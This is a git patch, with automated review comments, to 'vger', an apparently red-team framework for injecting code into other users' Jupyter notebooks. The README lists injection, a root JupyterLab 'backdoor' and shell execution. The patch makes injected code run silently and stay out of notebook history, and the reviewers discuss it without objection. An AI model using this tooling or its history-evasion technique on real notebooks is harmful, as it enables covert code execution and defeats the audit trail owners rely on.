From a0a2fcb0a2eea8c8bd70f281192433f84b1e2542 Mon Sep 17 00:00:00 2001
From: Joe Lucas
Date: Sun, 21 Jan 2024 14:26:53 -0600
Subject: [PATCH] fix some history management
---
 README.md | 2 +-
 pyproject.toml | 2 +-
 vger/attack.py | 4 ++--
 vger/exploit.py | 20 ++++----------------
 4 files changed, 8 insertions(+), 20 deletions(-)
diff --git a/README.md b/README.md
index f73c3b0..bd29a96 100644
--- a/README.md
+++ b/README.md
@@ -28,7 +28,7 @@ The top level menu is:
 These menus contain the following functionality:
 - **List modules**: Identify imported modules in target notebooks to determine what libraries are available for injected code.
-- **Inject**: Execute code in the context of the selected notebook. Code can be provided in a text editor or by specifying a local `.py` file. Either input is processed as a string and executed in runtime of the notebook. Output will be transparent to other notebook users by specifying `Noisy` or `Stealthy` when prompted. This selection will also dictate how much information is returned to the user about their execution.
+- **Inject**: Execute code in the context of the selected notebook. Code can be provided in a text editor or by specifying a local `.py` file. Either input is processed as a string and executed in runtime of the notebook.
 - **Backdoor**: Launch a new JupyterLab instance open to `0.0.0.0`, with `allow-root` on a user-specified `port` with a user-specified `password`.
 - **Check History**: See ipython commands recently run in the target notebook.
 - **Run shell command**: Spawn a terminal, run the command, return the output, and delete the terminal.
diff --git a/pyproject.toml b/pyproject.toml
index 3932940..cd7da61 100644
--- a/pyproject.toml
+++ b/pyproject.toml
@@ -1,6 +1,6 @@
 [tool.poetry]
 name = "vger"
-version = "0.1.4"
+version = "0.1.5"
 description = "An execution framework for Jupyter environments."
 authors = ["Joseph Lucas "]
 license = "GPL-3.0-only"
diff --git a/vger/attack.py b/vger/attack.py
index a4e562f..17ce781 100644
--- a/vger/attack.py
+++ b/vger/attack.py
@@ -12,13 +12,13 @@
 async def attack_session(
- connection, session, code, silent=False, print_out=True, get_hist=False
+ connection, session, code, silent=True, print_out=True, get_hist=False
 ):
 jpy_sess = connection.jpy_sessions[session]
 code_msg_id = str(uuid.uuid1())
 code_msg = {
 "channel": "shell",
- "content": {"silent": silent, "code": code},
+ "content": {"silent": silent, "store_history": False, "code": code},
 "header": {"msg_id": code_msg_id, "msg_type": "execute_request"},
 "metadata": {},
 "parent_header": {},
diff --git a/vger/exploit.py b/vger/exploit.py
index d7e2239..13f1af8 100644
--- a/vger/exploit.py
+++ b/vger/exploit.py
@@ -15,12 +15,12 @@ def inject(self):
 attack_menu = [
 inquirer.List(
 name="payload",
- message="Would you like to type your payload or reference an existing .py file?",
- choices=["Type", ".py"],
+ message="Would you like to use an editor for your payload or reference an existing .py file?",
+ choices=["editor", ".py"],
 )
 ]
 answer = inquirer.prompt(attack_menu)
- if answer["payload"] == "Type":
+ if answer["payload"] == "editor":
 payload_str = inquirer.editor("What code would you like to inject?")
 else:
 payload = [
@@ -35,21 +35,9 @@ def inject(self):
 path = answer["path"].split("? ")[-1]
 with open(path, "r") as f:
 payload_str = f.read()
- silent = [
- inquirer.List(
- "choice",
- message="Would you like show up in the history and modify the execution counter?",
- choices=["Yes (Noisy)", "No (Stealthy)"],
- )
- ]
- answer = inquirer.prompt(silent)
- if "Yes" in answer["choice"]:
- silent = False
- else:
- silent = True
 loop = asyncio.get_event_loop()
 loop.run_until_complete(
- attack_session(self.connection, self.target, payload_str, silent=silent)
+ attack_session(self.connection, self.target, payload_str)
 )
 def dump_history(self):
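Review bot: In vger/attack.py, `attack_session` changes its contract here without documenting it: `silent` now defaults to True and `"store_history": False` is fixed in the request content, so callers that omitted `silent` behave differently. Under the Jupyter messaging spec a silent `execute_request` already forces `store_history` off and also suppresses IOPub output and `execute_result`, so the `print_out=True` default may have nothing to show; the code that reads the replies is outside this hunk, so that needs checking. I would add a docstring stating that code sent this way is not recorded in the kernel's IPython history and does not advance the execution counter, which means notebook history is not a reliable record of what ran and any audit trail has to come from the operator's own notes or server-side logging.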
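Review bot: In vger/exploit.py, the call at the end of `inject` now depends on the default that the vger/attack.py hunk changes, which is easy to miss when reading this file on its own. Passing the flag explicitly, `attack_session(self.connection, self.target, payload_str, silent=True)`, keeps the behaviour visible at the call site and stable if the default changes again. `inject` starts before this hunk, and the first exploit.py hunk only renames the menu choice.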